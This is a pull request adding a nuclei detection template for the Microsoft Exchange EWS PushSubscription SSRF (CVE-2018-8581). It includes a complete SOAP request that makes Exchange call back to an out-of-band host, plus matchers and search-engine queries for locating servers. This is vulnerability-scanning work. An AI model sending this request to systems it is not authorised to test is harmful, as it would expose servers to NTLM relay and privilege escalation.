### PR TITLE
Add CVE-2018-8581 template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,91 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server EWS PushSubscription - SSRF
+  author: Simplereally
+  severity: high
+  description: |
+    Microsoft Exchange Server contains a Server-Side Request Forgery vulnerability in the Exchange Web Services PushSubscription feature.
+    An authenticated attacker can create a push subscription that forces Exchange to authenticate via NTLM to an attacker-controlled URL,
+    enabling privilege escalation through NTLM relay attacks.
+  impact: |
+    An authenticated attacker can relay Exchange server NTLM credentials to escalate privileges, potentially achieving Domain Administrator access.
+  remediation: |
+    Delete the DisableLoopbackCheck registry key and apply Microsoft security updates. Enable Extended Protection for Authentication on Exchange.
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+    - https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
+    - https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
+    - https://github.com/dirkjanm/privexchange
+    - https://github.com/Ridter/Exchange2domain
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 7.4
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+    epss-score: 0.97108
+    epss-percentile: 0.99818
+    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: microsoft
+    product: exchange_server
+    shodan-query: cpe:"cpe:2.3:a:microsoft:exchange_server"
+    fofa-query: app="Microsoft-Exchange"
+  tags: cve,cve2018,microsoft,exchange,ews,ssrf,oast,kev
+
+http:
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml; charset=utf-8
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+          <soap:Header>
+            <t:RequestServerVersion Version="Exchange2016"/>
+          </soap:Header>
+          <soap:Body>
+            <m:Subscribe>
+              <m:PushSubscriptionRequest>
+                <t:FolderIds>
+                  <t:DistinguishedFolderId Id="inbox"/>
+                </t:FolderIds>
+                <t:EventTypes>
+                  <t:EventType>NewMailEvent</t:EventType>
+                </t:EventTypes>
+                <t:StatusFrequency>1</t:StatusFrequency>
+                <t:URL>http://{{interactsh-url}}/</t:URL>
+              </m:PushSubscriptionRequest>
+            </m:Subscribe>
+          </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: dsl
+        dsl:
+          - 'status_code == 200 && contains(body, "SubscribeResponse") && contains(body, "SubscriptionId")'
+
+    extractors:
+      - type: regex
+        name: subscription-id
+        part: body
+        group: 1
+        regex:
+          - '<[a-z]:SubscriptionId>([^<]+)</[a-z]:SubscriptionId>'
+
+      - type: kval
+        part: header
+        kval:
+          - x_owa_version


### PR DESCRIPTION
## Summary
Adds nuclei template for CVE-2018-8581 - Microsoft Exchange Server SSRF via EWS PushSubscription.

## Detection
- Uses OAST callback to confirm SSRF
- Fallback matcher for successful subscription response
- Targets EWS endpoint with PushSubscription SOAP request

## References
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
- https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

/claim #14576